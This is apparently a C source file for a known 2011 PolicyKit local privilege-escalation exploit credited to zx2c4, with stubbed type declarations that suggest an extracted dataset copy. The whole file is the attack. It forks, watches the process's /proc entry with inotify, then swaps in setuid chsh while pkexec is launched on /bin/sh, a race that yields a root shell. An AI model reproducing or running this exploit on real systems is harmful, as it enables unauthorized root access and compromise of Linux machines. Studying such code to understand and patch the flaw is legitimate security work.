
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int IN_ACCESS ;
 int close (int) ;
 int execl (char*,char*,char*,...) ;
 scalar_t__ fork () ;
 int getpid () ;
 int inotify_add_watch (int,char*,int ) ;
 int inotify_init () ;
 int perror (char*) ;
 int printf (char*) ;
 int read (int,int *,int ) ;
 int sleep (int) ;
 int sprintf (char*,char*,int) ;

int main(int argc, char **argv)
{
 printf("=============================\n");
 printf("=      PolicyKit Pwnage     =\n");
 printf("=          by zx2c4         =\n");
 printf("=        Sept 2, 2011       =\n");
 printf("=============================\n\n");

 if (fork()) {
  int fd;
  char pid_path[1024];
  sprintf(pid_path, "/proc/%i", getpid());
  printf("[+] Configuring inotify for proper pid.\n");
  close(0); close(1); close(2);
  fd = inotify_init();
  if (fd < 0)
   perror("[-] inotify_init");
  inotify_add_watch(fd, pid_path, IN_ACCESS);
  read(fd, ((void*)0), 0);
  execl("/usr/bin/chsh", "chsh", ((void*)0));
 } else {
  sleep(1);
  printf("[+] Launching pkexec.\n");
  execl("/usr/bin/pkexec", "pkexec", "/bin/sh", ((void*)0));
 }
 return 0;
}
